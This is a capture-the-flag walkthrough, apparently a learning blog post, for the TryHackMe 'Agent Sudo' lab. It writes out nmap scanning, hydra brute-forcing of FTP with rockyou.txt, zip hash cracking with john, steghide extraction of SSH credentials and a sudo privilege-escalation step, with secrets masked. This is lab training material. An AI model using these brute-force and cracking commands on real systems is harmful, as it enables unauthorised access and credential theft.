Welcome back to another TryHackMe room, the challenge today is Agent Sudo.
No spoilers below within the hints, just some good ol’ fashion hints to help you out on your agent sudo journey. For more detail, with some spoilers, see the steps section, and for everything I did, see my notes. If you prefer a video walkthrough, well that’s linked below, and if you want my personal thoughts on the room, check out the reflection via the video.
Disclaimer, there are spoilers for this room below, please use the hints if you do not want any steps spoiled. Room creator credit: DesKel.
Hints
Task 2 Enumerate
- How many open ports?
nmap
can show you. - How you redirect yourself to a secret page? Read the note on
index.html
- What is the agent name? Use the web dev tools to change
user-*****
Task 3 Hash cracking and brute-force
- FTP password. Use
hydra
withrockyou.txt
- Zip file password. Use
binwalk
to really see thepng
, thenzip2jon
. - steg password. Use
steghide
to really see thejpg
. - Who is the other agent (in full name)?
cat
your newmessage.txt
- SSH password.
base64 -d
Task 4 Capture the user flag
- What is the user flag? Once in, simple
cat
- What is the incident of the photo called? Use OSINT via bing.
Task 5 Privilege escalation
- CVE number for the escalation.
sudo -*
- What is the root flag?
cat /root/root.txt
- (Bonus) Who is Agent R? see
root.txt
Steps
- Task 2 Enumerate, as always, start by scanning the machine, I used
nmap -vv -A <ip>
. We can see ports 21, 22 and 80, so most likely we have a web server running, let’s confirm this. - Visithttp://<ip> to get the next clue, change the user-agent by going to Inspect (DevTools) > Customise and control DevTools > More Tools > Network conditions, User agent. Here you can change the user-agent by disabling/unchecking Use browser default. Reload the page, and you’re done!
- Task 3 Hash cracking and brute-force. Now that leads us back to port 21, ftp, so now armed with a username, let’s use brute force. Use hydra -t 32 -l ***** -P /usr/share/wordlists/rockyou.txt -vV <ip> ftp against the target and you’ll be able to find the password, so then log in using ftp <ip>, and mget * to copy all the files.
- It’s time to examine what we’ve found, run file * to show some basic info, but use binwalk to show hidden info within the files. Then binwalk -e cutie.png to pull out the data, again running file * will help here with new files. Use zip2john 8702.zip > 8702.hashes to extract the hash, then john 8702.hashes to crack it.
- The new text file provides a cryptic message, we can decode this using echo ******** | base64 -d. That’s the steg password, use
steghide extract -sf cute-alien.jpg -p ******
to gain SSH creds, thenssh *****@<ip>
. Next up, Task 4 Capture the user flag. - Now copy the files over via
scp -r * *****@<ip>: .
, use a bit of OSINT and find the CVE. For more, use my notes below or hints above for help, enjoy!
Notes
nmap: nmap -vv -A <ip>
Completed NSE at 02:52, 0.00s elapsed
Nmap scan report for 10.10.253.182
Host is up, received conn-refused (0.32s latency).
Scanned at 2022-07-06 02:51:25 EDT for 42s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.85 seconds
Visit: http://<ip>
Changed User-Agent [Link], redirected: http://<ip>/agent_C_attention.php
, Found name Agent C.
Attention *****,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
Crack FTP: hydra -t 32 -l ***** -P /usr/share/wordlists/rockyou.txt -vV <ip> ftp
[LINK]
[21][ftp] host: <ip> login: ***** ****password: *****
Logged into FTP ftp <ip>
, ran mget *
to get all the files.
Examine images: binwalk
, extracted image data: binwalk -e cutie.png
.
Installed sudo apt install 7zip
[Link, Link] 7z e 365.zlib
.
Cracking zip file [Link]: zip2john 8702.zip > 8702.hashes
, john 8702.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
***** ****(8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE 2/3 (2022-07-08 01:35) 2.222g/s 101044p/s 101044c/s 101044C/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
cat To_agentR.txt
Agent C,
We need to send the picture to **'********'** as soon as possible!
By,
Agent R
Finding hash value: echo ******** | base64 -d
, steghide extract -sf cute-alien.jpg -p ******
.
Hi *****,
Glad you find this message. Your login password is ****************
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
*****
Connect via SSH: ssh *****@<ip>
, copy over image: scp -r * *****@<ip>: .
[Link, Link].
Ran sudo -*
, searched ‘exploit sudo ************’, found exploit sudo ***** *********
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
********************************
By,
****** a.k.a Agent R
This is day 54 of #100DaysOfHacking on my Hackers Learning Path. Subscribe for CyberSec updates or read more, happy hacking, coding, and ‘learning.